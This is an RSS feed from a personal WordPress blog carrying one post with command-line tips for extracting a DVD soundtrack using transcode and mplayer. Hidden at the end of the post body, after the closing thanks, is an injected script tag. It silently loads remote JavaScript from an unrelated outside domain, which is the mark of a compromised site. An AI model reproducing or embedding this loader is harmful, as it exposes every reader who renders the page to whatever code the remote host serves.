<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jkx@home &#187; dvd</title>
	<atom:link href="http://www.larsen-b.com/tags/dvd/feed" rel="self" type="application/rss+xml" />
	<link>http://www.larsen-b.com</link>
	<description>Titanium Exposé</description>
	<lastBuildDate>Fri, 31 Oct 2025 02:15:37 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5</generator>
		<item>
		<title>Extract soundtrack (MP3) from DVD with mplayer</title>
		<link>http://www.larsen-b.com/Article/186.html</link>
		<comments>http://www.larsen-b.com/Article/186.html#comments</comments>
		<pubDate>Sun, 26 Dec 2004 01:40:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Utils]]></category>
		<category><![CDATA[divx]]></category>
		<category><![CDATA[dvd]]></category>
		<category><![CDATA[mp3]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[I &#8216;m wondering if i gonna add a mplayer tips here ? :) To extract a mp3 from a DVD, the easy way is to use transcode transcode -i /dev/dvd -x dvd -T 1,2,1 -a 0 -y raw -m track22.mp3 &#8230; <a href="http://www.larsen-b.com/Article/186.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>I &#8216;m wondering if i gonna add a mplayer tips here ? :)</p>
<p>To extract a mp3 from a DVD, the easy way is to use transcode</p>
<pre class="literal-block">transcode -i /dev/dvd -x dvd -T 1,2,1 -a 0 -y raw -m track22.mp3</pre>
<p>But sometimes, this doesn&#8217;t works.. in fact I get a random transcode segfault. As mplayer is the perfect video kniffe. I decided to test this w/ mplayer</p>
<pre class="literal-block">mplayer -ao pcm dvd://1 -chapter 22</pre>
<p>This won&#8217;t build a .mp3 but a big wave file, not matter lame is my friend anyways.</p>
<p>PS: The latest <a class="reference" href="http://www.transcoding.org/cgi-bin/transcode">transcode</a> should fix the issue, but I&#8217;m unable to build it on my debian. libavcodec2-dev is broken. (Wondering why i&#8217;m still using this distro &#8230; :(</p>
<p>&#8211; thanks #mplayer for the help (as usual)<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/186.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
